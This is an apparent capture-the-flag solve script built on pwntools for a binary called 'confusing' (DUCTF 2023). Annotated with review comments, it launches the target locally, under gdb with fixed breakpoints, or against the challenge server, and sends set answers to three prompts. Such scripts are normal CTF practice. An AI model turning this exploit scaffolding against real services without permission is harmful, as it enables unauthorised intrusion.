from pwn import *
import os
# NOTE(review): this assignment runs after `from pwn import *`. pwntools
# appears to read PWNLIB_* variables while it is being imported, so the flag
# probably does not change this script's own log level -- confirm. It is still
# inherited by every child process started below.
os.environ.update({"PWNLIB_DEBUG": "1"})

# GDB command script passed to gdb.debug() by start(). It clears LINES and
# COLUMNS from the debuggee's environment, follows the child across a fork,
# sets three breakpoints at fixed offsets from main, and continues.
# The offsets are tied to one particular build of the binary; presumably they
# must be re-derived if the binary is rebuilt.
gs = '''
unset env LINES
unset env COLUMNS
set follow-fork-mode child
# br *main+78 # first scanf
br *main+160
br *main+170
br *main+220
c
'''

# The target is looked up in the current working directory, so the script
# loads (and start() later executes) whichever file named "confusing" sits in
# the directory it is launched from.
elf = ELF("{}/confusing".format(os.getcwd()))
def start():
    """Open a tube to the target selected on the command line.

    The mode comes from pwntools' ``args`` object and is checked in this
    order, so GDB wins when both flags are given:

    * ``GDB``    -- run the local binary under gdb with the ``gs`` script.
    * ``REMOTE`` -- connect to the hard-coded host and port.
    * neither    -- run the local binary directly.

    Returns:
        The tube returned by ``gdb.debug``, ``remote`` or ``process``.
    """
    if args.GDB:
        target = gdb.debug(elf.path, gs)
    elif args.REMOTE:
        # Host and port are fixed in the script, not read from the command line.
        target = remote("2023.ductf.dev", 30024)
    else:
        # Executes the local binary as the current user.
        target = process(elf.path)
    return target
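# Answer the target's three prompts with fixed values, then hand the session
# to the operator. The loop has no exit condition: when interactive() returns,
# a new target is opened through start(). Only an exception from the tube
# (for example a connection that closes before a prompt arrives) or an
# interrupt ends the script.
while True:
    io = start()
    try:
        # Each prompt is printed as received so the exchange shows up on the
        # terminal.
        print(io.recvuntil(b"Give me d: "))
        io.sendline(b"7")
        print(io.recvuntil(b"Give me s: "))
        io.sendline(b"FLAG")  # + b"\xff"*4)
        print(io.recvuntil(b"Give me f: "))
        io.sendline(b"2")
        io.interactive()
    finally:
        # Without this, every pass left its process or socket open. Close the
        # tube on all exit paths so repeated passes do not pile up child
        # processes or connections to the remote host.
        io.close()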